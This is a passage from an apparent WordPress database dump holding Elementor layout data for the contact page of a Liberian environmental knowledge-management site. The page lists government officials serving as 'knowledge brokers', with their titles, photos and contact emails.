Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23422,3405,'_elementor_edit_mode','builder'),(23423,3405,'_elementor_template_type','wp-page'),(23424,3405,'_elementor_version','3.0.16'),(23425,3405,'_wp_page_template','default'),(23426,3405,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a 